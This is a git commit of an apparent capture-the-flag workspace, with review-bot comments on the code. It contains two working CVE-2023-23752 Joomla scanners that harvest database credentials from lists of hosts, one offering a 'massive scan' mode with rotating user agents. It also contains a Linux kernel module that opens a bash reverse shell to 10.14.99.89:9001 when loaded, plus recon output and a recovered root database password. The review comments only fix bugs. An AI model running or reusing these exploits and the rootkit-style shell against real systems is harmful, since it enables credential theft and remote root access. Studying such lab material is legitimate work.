initial commit

2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions


@@ -0,0 +1,67 @@
import argparse
import re
from typing import List, Tuple, Optional
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
class URLScanner:
def __init__(self, url_list: List[str], output_file: Optional[str], endpoint: str = "/api/index.php/v1/config/application?public=true", timeout: int = 2, max_threads: int = 10) -> None:
self.url_list: List[str] = url_list
self.output_file: Optional[str] = output_file
self.regex: re.Pattern = re.compile(r'"user":"(.*?)".*?"password":"(.*?)".*?"db":"(.*?)"')
self.endpoint: str = endpoint
self.timeout: int = timeout
self.max_threads: int = max_threads
def scan_url(self, url: str) -> None:
try:
response = requests.get(f"http://{url}{self.endpoint}", timeout=self.timeout)
if response.ok:
match = self.regex.search(response.text)
if match:
user, password, db = match.groups()
if user and password and db:
print(f"[+] => Vulnerable {url}")
print(f"User: {user} Password: {password} Database: {db}")
if self.output_file:
with open(self.output_file, "a+") as f:
f.write(f"{url} user:{user} password:{password} database:{db}\n")
print(f"File Saved => {self.output_file}")
else:
print(f"[-] => User, password, or database is empty for {url}")
else:
print(f"[-] => Not Vulnerable {url}")
except requests.exceptions.RequestException as e:
print(f"[-] => Error occurred for {url}: {e}")
def scan(self) -> None:
with ThreadPoolExecutor(max_workers=self.max_threads) as executor:
futures = []
for url in self.url_list:
futures.append(executor.submit(self.scan_url, url))
for future in as_completed(futures):
future.result()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
url_group = parser.add_mutually_exclusive_group(required=True)
url_group.add_argument("-u", "--url", type=str, help="URL to scan")
url_group.add_argument("-f", "--file", type=str, help="Path to the file containing URLs to scan")
parser.add_argument("-o","--output_file", type=str, help="Path to the output file (optional)")
parser.add_argument("-e","--endpoint", type=str, default="/api/index.php/v1/config/application?public=true", help="Endpoint to scan (default: /api/index.php/v1/config/application?public=true)")
parser.add_argument("-t","--timeout", type=int, default=2, help="Timeout in seconds (default: 2)")
parser.add_argument("-m","--max_threads", type=int, default=10, help="Maximum number of threads (default: 10)")
args = parser.parse_args()
if args.url:
url_list: List[str] = [args.url]
else:
with open(args.file) as f:
url_list: List[str] = [line.strip() for line in f.readlines()]
scanner: URLScanner = URLScanner(url_list, args.output_file, endpoint=args.endpoint, timeout=args.timeout, max_threads=args.max_threads)
scanner.scan()
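Review bot: scan_url appends to self.output_file from up to max_threads worker threads with no lock, so lines from hits that land at the same time can interleave in the file; the `with open(self.output_file, "a+") as f:` write should be serialized with a `threading.Lock` held around it, or results collected and written once from scan(). The same block prints and stores recovered database credentials in plaintext, so the output file needs restrictive permissions and should be kept out of version control. Separately, the request URL is built as `f"http://{url}{self.endpoint}"`, so a list entry that already carries a scheme yields `http://http://…`; strip or honour an existing scheme before formatting. The file header for this section is not visible, so its path is unknown.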

7
CTF/Voyage/Makefile Normal file

@@ -0,0 +1,7 @@
obj-m +=reverse-shell.o
all:
make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) modules
clean:
make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) clean


@@ -0,0 +1,14 @@
{
"cms_id": "joom",
"cms_name": "joomla",
"cms_url": "https://joomla.org",
"detection_param": "header",
"directory_listing": "http://10.10.159.45/administrator/modules,http://10.10.159.45/administrator/templates,http://10.10.159.45/administrator/components,http://10.10.159.45/images/banners,",
"joomla_backup_files": "http://10.10.159.45/administrator,",
"joomla_debug_mode": "disabled",
"joomla_readme_file": "http://10.10.159.45/README.txt",
"joomla_version": "4.2.7",
"last_scanned": "2025-10-20 15:37:32.943883",
"url": "http://10.10.159.45",
"vulnerabilities_count": "0"
}

1411
CTF/Voyage/deepce.sh Normal file

File diff suppressed because it is too large Load Diff


@@ -0,0 +1,19 @@
/.htaccess  (Status: 403) [Size: 277]
/.htpasswd  (Status: 403) [Size: 277]
/administrator  (Status: 301) [Size: 320] [--> http://10.10.159.45/administrator/]
/api  (Status: 301) [Size: 310] [--> http://10.10.159.45/api/]
/cache  (Status: 301) [Size: 312] [--> http://10.10.159.45/cache/]
/cli  (Status: 301) [Size: 310] [--> http://10.10.159.45/cli/]
/components  (Status: 301) [Size: 317] [--> http://10.10.159.45/components/]
/images  (Status: 301) [Size: 313] [--> http://10.10.159.45/images/]
/includes  (Status: 301) [Size: 315] [--> http://10.10.159.45/includes/]
/language  (Status: 301) [Size: 315] [--> http://10.10.159.45/language/]
/layouts  (Status: 301) [Size: 314] [--> http://10.10.159.45/layouts/]
/libraries  (Status: 403) [Size: 277]
/media  (Status: 301) [Size: 312] [--> http://10.10.159.45/media/]
/modules  (Status: 301) [Size: 314] [--> http://10.10.159.45/modules/]
/plugins  (Status: 301) [Size: 314] [--> http://10.10.159.45/plugins/]
/robots.txt  (Status: 200) [Size: 764]
/server-status  (Status: 403) [Size: 277]
/templates  (Status: 301) [Size: 316] [--> http://10.10.159.45/templates/]
/tmp  (Status: 301) [Size: 310] [--> http://10.10.159.45/tmp/]


@@ -0,0 +1 @@
/console  (Status: 200) [Size: 1563]


@@ -0,0 +1,4 @@
inv-007
inv-042
inv-133
inv-666


@@ -0,0 +1,4 @@
John Matrix
Elena Shadow
Victor Night
Anonymous

124
CTF/Voyage/joomla.py Normal file

@@ -0,0 +1,124 @@
import aiohttp
import asyncio
import os , time
import re
import colorama
import urllib3
from colorama import Fore, init
from fake_useragent import UserAgent
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if not os.path.exists('Results'):
os.mkdir('Results')
MAX_REQUESTS_PER_SECOND = 2
LAST_REQUEST_TIME = 0
user_agent_rotator = UserAgent()
def Banner():
print(Fore.LIGHTCYAN_EX+r" ___ _ _ ___ ___ ___ ___ ____ ___ ____ ___ ___ ___ ")
print(Fore.LIGHTCYAN_EX+r"| _]| | || __] [_ ]| |[_ ][__ / ___ [_ ][__ /|_ || __|[_ ]")
print(Fore.LIGHTCYAN_EX+r"| [__| | || _] / / | / | / / [_ \ |___| / / [_ \ / / `__ \ / / ")
print(Fore.LIGHTCYAN_EX+r"\___/|__/ |___] [___] \__|[___][___/ [___][___//_/ |___/[___]")
print(Fore.GREEN+"Github"+Fore.LIGHTWHITE_EX+" https://github.com/Pushkarup ")
print(Fore.GREEN+"LinkedIn"+Fore.LIGHTWHITE_EX+" https://www.linkedin.com/in/pushkar-upadhyay ")
print(f"{Fore.YELLOW}[PoC By PUSHKAR UPADHYAY] - {Fore.GREEN}JOOMLA DATABASE FETCH")
async def fetch(session, url):
global LAST_REQUEST_TIME
current_time = time.time()
elapsed_time_since_last_request = current_time - LAST_REQUEST_TIME
if elapsed_time_since_last_request < 1 / MAX_REQUESTS_PER_SECOND:
await asyncio.sleep(1 / MAX_REQUESTS_PER_SECOND - elapsed_time_since_last_request)
LAST_REQUEST_TIME = time.time()
headers = {
"Host": url,
"content-type": "application/vnd.api+json",
"User-Agent": user_agent_rotator.random,
}
async with session.get(url, headers=headers, verify_ssl=True, timeout=10) as response:
return await response.text(), response.status
async def scan_single_url(session, url):
print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]")
config_url = url + '/api/index.php/v1/config/application?public=true'
content, status = await fetch(session, config_url)
if status == 200 and b'dbtype' in content.encode():
decoded_content = content
dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0]
dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0]
host = re.findall('"host":"(.*?)"', decoded_content)[0]
db = re.findall('"db":"(.*?)"', decoded_content)[0]
user = re.findall('"user":"(.*?)"', decoded_content)[0]
password = re.findall('"password":"(.*?)"', decoded_content)[0]
print(f"{Fore.YELLOW}\n[+] Domain : {Fore.GREEN}{url}")
print(f"{Fore.YELLOW}[+] Database Type : {Fore.GREEN}{dbtype}")
print(f"{Fore.YELLOW}[+] Database Prefix : {Fore.GREEN}{dbprefix}")
print(f"{Fore.YELLOW}[+] Database : {Fore.GREEN}{db}")
print(f"{Fore.YELLOW}[+] Hostname : {Fore.GREEN}{host}")
print(f"{Fore.YELLOW}[+] Username : {Fore.GREEN}{user}")
print(f"{Fore.YELLOW}[+] Password : {Fore.GREEN}{password}\n")
with open('Results/Configurations.txt', 'a') as f:
f.write(f"[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n")
return decoded_content, True
else:
print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]")
return '', False
async def scan_multiple_urls(filename):
tasks = []
async with aiohttp.ClientSession() as session:
with open(filename, 'r') as file:
urls = [line.strip() for line in file if line.strip()]
for url in urls:
tasks.append(scan_single_url(session, url))
return await asyncio.gather(*tasks)
def result_summarization(results):
successful_scans = sum(1 for _, success in results if success)
failed_scans = len(results) - successful_scans
error_count = sum(1 for _, success in results if not success)
print("\n======== Scan Summary ========")
print(f"Successful Scans: {successful_scans}")
print(f"Failed Scans: {failed_scans}")
print(f"Errors Encountered: {error_count}")
if __name__ == '__main__':
try:
filename = input(f"\n{Fore.YELLOW}Enter the filename containing URLs: {Fore.RESET}")
if not os.path.isfile(filename):
print(f"{Fore.RED}Error: The specified file does not exist.")
exit()
choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}")
if choice == '1':
url = input(f"\n{Fore.YELLOW}Enter a single IP/Domain: {Fore.RESET}")
asyncio.run(scan_single_url(url))
elif choice == '2':
results = asyncio.run(scan_multiple_urls(filename))
result_summarization(results)
else:
print(f"\n{Fore.RED}Invalid option selected")
except KeyboardInterrupt:
print(f"\n{Fore.RED}Scan interrupted by user.")
except Exception as e:
print(f"{Fore.RED}An unexpected error occurred: {str(e)}")
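Review bot: the single-scan branch calls `asyncio.run(scan_single_url(url))` with one argument although the coroutine is declared as `scan_single_url(session, url)`, so option 1 always fails with a TypeError that the broad `except Exception` then reports as an unexpected error; it needs a small wrapper coroutine that opens `aiohttp.ClientSession()` and awaits `scan_single_url(session, url)`, the same way scan_multiple_urls does. fetch also sets `"Host": url` to the full request URL rather than the host name, which servers may reject; drop that header and let aiohttp derive it. In result_summarization, `error_count` uses the same predicate as `failed_scans`, so the summary prints the same number twice. The `re.findall(...)[0]` chain in scan_single_url raises IndexError as soon as one key is absent from the response, which again surfaces only as the generic error message.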

8579
CTF/Voyage/linpeas.sh Normal file

File diff suppressed because one or more lines are too long

47
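--- a/CTF/Voyage/nmap_scan1.txt
+++ b/CTF/Voyage/nmap_scan1.txt
@@ -0,0 +1,47 @@
+# Nmap 7.95 scan initiated Mon Oct 20 15:16:02 2025 as: /usr/lib/nmap/nmap --privileged -p 22,80,2222,5000 -A -T4 -oN nmap_scan1.txt 10.10.159.45
+Nmap scan report for 10.10.159.45
+Host is up (0.097s latency).
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 256 0d:04:12:6a:ba:d3:d4:6b:2d:2b:db:4d:f6:8e:ee:d6 (ECDSA)
+|_ 256 96:4b:b4:4d:a8:fc:b2:6b:ee:97:77:bb:85:23:df:9b (ED25519)
+80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
+| http-robots.txt: 16 disallowed entries (15 shown)
+| /joomla/administrator/ /administrator/ /api/ /bin/
+| /cache/ /cli/ /components/ /includes/ /installation/
+|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
+|_http-generator: Joomla! - Open Source Content Management
+|_http-server-header: Apache/2.4.58 (Ubuntu)
+2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 3072 ad:4a:7e:34:01:09:f8:68:d8:f7:dd:b8:57:d4:17:cf (RSA)
+| 256 8d:cd:5e:60:35:c8:65:66:3a:c5:5c:2f:ac:62:93:80 (ECDSA)
+|_ 256 a9:d5:16:b1:5d:4a:4c:94:3f:fd:a9:68:5f:24:ee:79 (ED25519)
+5000/tcp closed upnp
+No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
+TCP/IP fingerprint:
+OS:SCAN(V=7.95%E=4%D=10/20%OT=22%CT=5000%CU=40939%PV=Y%DS=2%DC=T%G=Y%TM=68F
+OS:63634%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=
+OS:I%TS=A)SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR
+OS:=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SE
+OS:Q(SP=FB%GCD=1%ISR=108%TI=Z%CI=Z%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11NW7%O
+OS:3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=F4B3%W2=
+OS:F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M509NNSN
+OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
+OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=3F%W=0%S=Z%A=S+%F=AR%O
+OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
+OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
+OS:D=S)
+Network Distance: 2 hops
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+TRACEROUTE (using port 5000/tcp)
+HOP RTT ADDRESS
+1 147.88 ms 10.14.0.1
+2 147.92 ms 10.10.159.45
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Mon Oct 20 15:16:36 2025 -- 1 IP address (1 host up) scanned in 33.34 seconds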

10000
CTF/Voyage/numbers.txt Normal file

File diff suppressed because it is too large Load Diff

6
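--- a/CTF/Voyage/reports.json
+++ b/CTF/Voyage/reports.json
@@ -0,0 +1,6 @@
+{
+"last_updated": "2025-10-20 15:37:32.943779",
+"results": [
+{}
+]
+}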


@@ -0,0 +1,22 @@
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.14.99.89/9001 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);


@@ -0,0 +1,2 @@
[+] => Vulnerable 10.10.159.45
User: root Password: RootPassword@1234 Database: joomla_db

1
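--- a/CTF/Voyage/target.txt
+++ b/CTF/Voyage/target.txt
@@ -0,0 +1 @@
+10.10.158.45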
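Review bot: target.txt records 10.10.158.45, while the nmap report, the gobuster output, the CMS scan JSON and the scanner results in this commit all reference 10.10.159.45; this looks like a transposed digit and, if the same host is meant, the line should read `10.10.159.45`.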